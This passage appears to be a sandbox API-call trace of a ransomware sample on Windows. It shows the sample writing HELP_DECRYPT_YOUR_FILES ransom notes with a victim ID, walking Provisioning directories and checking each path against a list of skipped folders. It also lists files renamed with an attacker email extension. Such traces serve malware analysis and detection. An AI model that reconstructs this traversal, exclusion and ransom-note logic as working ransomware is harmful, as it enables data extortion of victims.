	[0173.741] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0173.744] CloseHandle (hObject=0x39c) returned 1
	[0173.745] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.745] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.746] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0173.747] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.747] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.747] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.748] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.748] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0173.748] CloseHandle (hObject=0x39c) returned 1
	[0173.749] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81162728, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb92b0
	[0173.749] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*") returned 97
	[0173.749] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.750] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*") returned 0x61
	[0173.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.755] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.755] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.755] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81162728, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.755] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.755] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81162728, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81162728, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8118bab1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.755] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8113f1c5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8113f1c5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81162728, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.755] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.755] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0173.756] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 1
	[0173.756] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 0
	[0173.756] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810a3c98, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x810a3c98, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x810a3c98, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0173.756] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810a3c98, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x810a3c98, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x810a3c98, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0173.757] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.757] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.757] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.757] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0173.757] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0173.758] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", cAlternateFileName="{9AEC5~1")) returned 1
	[0173.758] lstrcmpW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="..") returned 1
	[0173.758] lstrcmpW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2=".") returned 1
	[0173.758] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0173.758] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0173.758] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}"
	[0173.759] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}"
	[0173.759] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\"
	[0173.759] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\"
	[0173.759] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*"
	[0173.759] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.769] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned 84
	[0173.769] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.769] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned 0x54
	[0173.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.770] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="windows") returned 0x0
	[0173.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.770] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="boot") returned 0x0
	[0173.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.770] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="temp") returned 0x0
	[0173.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="program files") returned 0x0
	[0173.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="appdata") returned 0x0
	[0173.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="application data") returned 0x0
	[0173.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="winnt") returned 0x0
	[0173.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="tmp") returned 0x0
	[0173.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="cache") returned 0x0
	[0173.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="webcache") returned 0x0
	[0173.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="packages") returned 0x0
	[0173.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="cookies") returned 0x0
	[0173.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.775] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="programdata") returned 0x0
	[0173.775] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.775] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c88c62, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c88c62, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1c88c62, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1cac, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0173.775] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0173.775] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0173.775] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\"
	[0173.775] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"
	[0173.775] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned 99
	[0173.776] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.776] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned 0x63
	[0173.776] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.776] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.776] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"
	[0173.776] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned 99
	[0173.776] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.777] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.777] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.777] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
